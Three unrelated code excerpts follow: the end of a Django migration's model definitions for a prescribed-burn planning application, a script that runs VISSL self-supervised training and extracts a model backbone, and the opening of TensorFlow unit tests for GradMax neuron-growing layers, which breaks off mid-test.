u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'prescription.approval': {
'Meta': {'ordering': "[u'-id']", 'object_name': 'Approval'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_approval_created'", 'to': u"orm['auth.User']"}),
'extension_count': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'initial_valid_to': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime.now'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_approval_modified'", 'to': u"orm['auth.User']"}),
'prescription': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Prescription']"}),
'valid_to': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime.now'})
},
u'prescription.briefingchecklist': {
'Meta': {'ordering': "[u'smeac__id', u'id']", 'object_name': 'BriefingChecklist'},
'action': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['risk.Action']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_briefingchecklist_created'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_briefingchecklist_modified'", 'to': u"orm['auth.User']"}),
'notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'prescription': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Prescription']"}),
'smeac': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.SMEAC']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'prescription.defaultbriefingchecklist': {
'Meta': {'object_name': 'DefaultBriefingChecklist'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'smeac': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.SMEAC']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'prescription.district': {
'Meta': {'ordering': "[u'name']", 'object_name': 'District'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Region']"})
},
u'prescription.endorsement': {
'Meta': {'object_name': 'Endorsement'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_endorsement_created'", 'to': u"orm['auth.User']"}),
'endorsed': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_endorsement_modified'", 'to': u"orm['auth.User']"}),
'prescription': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Prescription']"}),
'role': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.EndorsingRole']"})
},
u'prescription.endorsingrole': {
'Meta': {'ordering': "[u'name']", 'object_name': 'EndorsingRole'},
'disclaimer': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '320'})
},
u'prescription.forecastarea': {
'Meta': {'ordering': "[u'name']", 'object_name': 'ForecastArea'},
'districts': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['prescription.District']", 'symmetrical': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'prescription.objective': {
'Meta': {'ordering': "[u'created']", 'object_name': 'Objective'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_objective_created'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_objective_modified'", 'to': u"orm['auth.User']"}),
'objectives': ('django.db.models.fields.TextField', [], {}),
'prescription': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Prescription']"})
},
u'prescription.prescription': {
'Meta': {'object_name': 'Prescription'},
'aircraft_burn': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'allocation': ('django.db.models.fields.PositiveSmallIntegerField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'approval_status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'approval_status_modified': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'area': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '12', 'decimal_places': '1'}),
'biodiversity_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'biodiversity_text_additional': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'burn_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'bushfire_act_zone': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'bushfire_risk_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'contentious': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'contentious_rationale': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_prescription_created'", 'to': u"orm['auth.User']"}),
'critical_stakeholders': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'prescriptions_critical'", 'symmetrical': 'False', 'to': u"orm['stakeholder.CriticalStakeholder']"}),
'district': ('smart_selects.db_fields.ChainedForeignKey', [], {'to': u"orm['prescription.District']", 'null': 'True', 'blank': 'True'}),
'endorsement_status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'endorsement_status_modified': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'endorsing_roles': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['prescription.EndorsingRole']", 'symmetrical': 'False'}),
'endorsing_roles_determined': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'forecast_areas': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['prescription.ForecastArea']", 'null': 'True', 'blank': 'True'}),
'forest_blocks': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignition_completed_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'ignition_status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'ignition_status_modified': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'last_season': ('django.db.models.fields.PositiveSmallIntegerField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'last_season_unknown': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_year': ('django.db.models.fields.PositiveIntegerField', [], {'max_length': '4', 'null': 'True', 'blank': 'True'}),
'last_year_unknown': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': "u'320'", 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_prescription_modified'", 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'perimeter': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '12', 'decimal_places': '1'}),
'planned_season': ('django.db.models.fields.PositiveSmallIntegerField', [], {'max_length': '64'}),
'planned_year': ('django.db.models.fields.PositiveIntegerField', [], {'max_length': '4'}),
'planning_status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'planning_status_modified': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'prescribing_officer': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'priority': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'prohibited_period': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'public_contacts': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'prescriptions_public_contact'", 'symmetrical': 'False', 'through': u"orm['stakeholder.PublicContact']", 'to': u"orm['stakeholder.Stakeholder']"}),
'purposes': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['prescription.Purpose']", 'symmetrical': 'False'}),
'rationale': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Region']"}),
'regional_objectives': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['prescription.RegionalObjective']", 'null': 'True', 'blank': 'True'}),
'remote_sensing_priority': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '4'}),
'shires': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['prescription.Shire']", 'null': 'True', 'blank': 'True'}),
'short_code': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'status_modified': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'tenures': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['prescription.Tenure']", 'symmetrical': 'False', 'blank': 'True'}),
'treatment_percentage': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'vegetation_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'vegetation_types': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['prescription.VegetationType']", 'null': 'True', 'blank': 'True'})
},
u'prescription.priorityjustification': {
'Meta': {'ordering': "[u'order']", 'unique_together': "((u'purpose', u'prescription'),)", 'object_name': 'PriorityJustification'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_priorityjustification_created'", 'to': u"orm['auth.User']"}),
'criteria': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_priorityjustification_modified'", 'to': u"orm['auth.User']"}),
'order': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'prescription': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Prescription']", 'null': 'True'}),
'priority': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'purpose': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Purpose']"}),
'rationale': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'relevant': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'prescription.purpose': {
'Meta': {'ordering': "[u'name']", 'object_name': 'Purpose'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'prescription.region': {
'Meta': {'object_name': 'Region'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'})
},
u'prescription.regionalobjective': {
'Meta': {'object_name': 'RegionalObjective'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_regionalobjective_created'", 'to': u"orm['auth.User']"}),
'fma_names': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'impact': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_regionalobjective_modified'", 'to': u"orm['auth.User']"}),
'objectives': ('django.db.models.fields.TextField', [], {}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Region']"})
},
u'prescription.season': {
'Meta': {'ordering': "[u'-start']", 'object_name': 'Season'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_season_created'", 'to': u"orm['auth.User']"}),
'end': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_season_modified'", 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '3'}),
'start': ('django.db.models.fields.DateField', [], {})
},
u'prescription.shire': {
'Meta': {'ordering': "[u'name']", 'unique_together': "((u'name', u'district'),)", 'object_name': 'Shire'},
'district': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.District']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'prescription.smeac': {
'Meta': {'object_name': 'SMEAC'},
'category': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'prescription.successcriteria': {
'Meta': {'ordering': "[u'created']", 'object_name': 'SuccessCriteria'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_successcriteria_created'", 'to': u"orm['auth.User']"}),
'criteria': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'prescription_successcriteria_modified'", 'to': u"orm['auth.User']"}),
'objectives': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['prescription.Objective']", 'symmetrical': 'False'}),
'prescription': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Prescription']"})
},
u'prescription.tenure': {
'Meta': {'ordering': "[u'name']", 'object_name': 'Tenure'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'prescription.vegetationtype': {
'Meta': {'ordering': "[u'name']", 'object_name': 'VegetationType'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'risk.action': {
'Meta': {'ordering': "[u'risk__category', u'-relevant', u'risk__name', u'pk']", 'object_name': 'Action'},
'context_statement': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'risk_action_created'", 'to': u"orm['auth.User']"}),
'day_of_burn': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'day_of_burn_administration': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'day_of_burn_command': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'day_of_burn_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'day_of_burn_completer': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'day_of_burn_execution': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'day_of_burn_include': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'day_of_burn_mission': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'day_of_burn_situation': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'risk_action_modified'", 'to': u"orm['auth.User']"}),
'post_burn': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'post_burn_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'post_burn_completer': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'pre_burn': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'pre_burn_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'pre_burn_completer': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'pre_burn_explanation': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'pre_burn_resolved': ('django.db.models.fields.CharField', [], {'default': "u'No'", 'max_length': '200', 'blank': 'True'}),
'relevant': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'risk': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['risk.Risk']"}),
'total': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'})
},
u'risk.risk': {
'Meta': {'ordering': "[u'category', u'name']", 'object_name': 'Risk'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['risk.RiskCategory']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'risk_risk_created'", 'to': u"orm['auth.User']"}),
'custom': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'risk_risk_modified'", 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'prescription': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Prescription']", 'null': 'True', 'blank': 'True'}),
'risk': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'})
},
u'risk.riskcategory': {
'Meta': {'ordering': "[u'name']", 'object_name': 'RiskCategory'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'stakeholder.criticalstakeholder': {
'Meta': {'ordering': "[u'id']", 'object_name': 'CriticalStakeholder'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'stakeholder_criticalstakeholder_created'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'interest': ('django.db.models.fields.TextField', [], {}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'stakeholder_criticalstakeholder_modified'", 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '320'}),
'organisation': ('django.db.models.fields.CharField', [], {'max_length': '320'}),
'prescription': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Prescription']"})
},
u'stakeholder.publiccontact': {
'Meta': {'object_name': 'PublicContact'},
'comment': ('django.db.models.fields.TextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'stakeholder_publiccontact_created'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'stakeholder_publiccontact_modified'", 'to': u"orm['auth.User']"}),
'prescription': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Prescription']"}),
'stakeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stakeholder.Stakeholder']"})
},
u'stakeholder.stakeholder': {
'Meta': {'object_name': 'Stakeholder'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '320', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'stakeholder_stakeholder_created'", 'to': u"orm['auth.User']"}),
'date': ('django.db.models.fields.DateField', [], {}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '320', 'blank': 'True'}),
'expired': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'stakeholder_stakeholder_modified'", 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '320'}),
'organisation': ('django.db.models.fields.CharField', [], {'max_length': '320'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '320', 'blank': 'True'})
}
}
complete_apps = ['prescription']
|
import sys
import argparse
import os
import tempfile
from os.path import join, basename, isfile, splitext, isdir
from collections import OrderedDict
import torch
from rastervision.pipeline.file_system.utils import (
sync_to_dir, make_dir, get_local_path)
from rastervision.aws_s3.s3_file_system import S3FileSystem
from vissl_experiments.utils import (
execute, run_remote_if_needed, get_file, open_zip_file)
def extract_backbone(ckpt_path, out_path):
print(f'Extracting backbone from {ckpt_path} to {out_path}...')
state_dict = torch.load(ckpt_path, map_location='cpu')
state_dict = state_dict['classy_state_dict']['base_model']['model']['trunk']
new_state_dict = OrderedDict()
remove_prefix = '_feature_blocks.'
for key, val in state_dict.items():
new_key = key[len(remove_prefix):]
new_state_dict[new_key] = val
torch.save(new_state_dict, out_path)
def run_vissl(config, dataset_dir, output_dir, extra_args, pretrained_path=None):
# Assume ImageNet format.
train_dir = join(dataset_dir, 'train')
val_dir = join(dataset_dir, 'val')
cmd = [
'python',
'/opt/vissl/vissl/tools/run_distributed_engines.py',
'hydra.verbose=true',
f'config={config}',
f'config.DATA.TRAIN.DATA_PATHS=["{train_dir}"]',
f'config.DATA.TEST.DATA_PATHS=["{val_dir}"]',
f'config.CHECKPOINT.DIR="{output_dir}"']
if pretrained_path:
cmd.append(f'config.MODEL.WEIGHTS_INIT.PARAMS_FILE="{pretrained_path}"')
cmd.extend(extra_args)
execute(cmd)
def main(args, extra_args):
make_dir(args.tmp_root)
make_dir(args.cache_dir)
with tempfile.TemporaryDirectory(dir=args.tmp_root) as tmp_dir:
output_uri = get_local_path(args.output_uri, tmp_dir)
pretrained_uri = (
get_file(args.pretrained_uri, args.cache_dir)
if args.pretrained_uri else None)
dataset_uri = open_zip_file(args.dataset_uri, args.cache_dir)
try:
run_vissl(
args.config, dataset_uri, output_uri, extra_args,
pretrained_path=pretrained_uri)
extract_backbone(
join(output_uri, 'checkpoint.torch'),
join(output_uri, 'backbone.torch'))
finally:
sync_to_dir(output_uri, args.output_uri)
def get_arg_parser():
parser = argparse.ArgumentParser(description='Run VISSL')
parser.add_argument('--config', default='')
parser.add_argument('--output-uri', default='')
parser.add_argument('--dataset-uri', default='')
parser.add_argument('--aws-batch', action='store_true')
parser.add_argument('--pretrained-uri', type=str, default=None)
parser.add_argument('--tmp-root', default='/opt/data/tmp/')
parser.add_argument('--cache-dir', default='/opt/data/data-cache/')
return parser
if __name__ == '__main__':
parser = get_arg_parser()
args, extra_args = parser.parse_known_args()
s3_file_args = ['dataset_uri', 'pretrained_uri']
run_remote_if_needed(args, extra_args, s3_file_args, 'vissl')
main(args, extra_args)
|
# coding=utf-8
# Copyright 2022 GradMax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for growneuron.layers."""
import absl.testing.parameterized as parameterized
import growneuron.layers as glayers
import tensorflow as tf
class LayerTest(parameterized.TestCase, tf.test.TestCase):
@parameterized.named_parameters(
('dense', tf.keras.layers.Dense(3), (3, 4)),
('batchnorm', tf.keras.layers.BatchNormalization(), (2, 4)),
('conv2d', tf.keras.layers.Conv2D(3, 3), (3, 5, 5, 4))
)
def test_consistency(self, layer, input_shape):
wrapped_layer = glayers.GrowLayer(layer)
x = tf.random.uniform(input_shape)
original_out = layer(x)
new_out = wrapped_layer(x)
self.assertAllEqual(original_out, new_out)
@parameterized.named_parameters(
('dense', tf.keras.layers.Dense(3), (3, 4), 1),
('dense_5neuron', tf.keras.layers.Dense(3), (3, 4), 5),
('conv2d', tf.keras.layers.Conv2D(3, 3), (3, 5, 5, 4), 1),
('conv2d_5neuron', tf.keras.layers.Conv2D(3, 3), (3, 5, 5, 4), 5),
)
def test_add_neurons_incoming_zeros(self, layer, input_shape, n_new):
wrapped_layer = glayers.GrowLayer(layer)
x = tf.random.uniform(input_shape)
original_out = wrapped_layer(x)
old_output_shape = original_out.get_shape()
n_neurons_old = old_output_shape[-1]
wrapped_layer.add_neurons(n_new, new_weights='zeros', is_outgoing=False)
new_out = wrapped_layer(x)
# Check the output has the expected shape
new_shape = old_output_shape[:-1] + [n_neurons_old+n_new]
self.assertAllEqual(new_shape, new_out.get_shape())
# Check the old neurons create same output
self.assertAllClose(original_out, new_out[Ellipsis, :n_neurons_old])
# Check the new neurons create zero output
self.assertEqual(0, tf.math.count_nonzero(new_out[Ellipsis, n_neurons_old:]))
new_weights, new_biases = wrapped_layer.get_weights()
# Check the new weights are zero
added_weights = new_weights[Ellipsis, n_neurons_old:]
self.assertAllEqual(added_weights, tf.zeros_like(added_weights))
# Check the new biases are zero
added_biases = new_biases[n_neurons_old:]
self.assertAllEqual(added_biases, tf.zeros_like(added_biases))
@parameterized.named_parameters(
('dense', tf.keras.layers.Dense(3), (3, 4), 1),
('dense_5neuron', tf.keras.layers.Dense(3), (3, 4), 5),
('conv2d', tf.keras.layers.Conv2D(3, 3), (3, 5, 5, 4), 1),
('conv2d_5neuron', tf.keras.layers.Conv2D(3, 3), (3, 5, 5, 4), 5),
)
def test_add_neurons_outgoing_zeros(self, layer, input_shape, n_new):
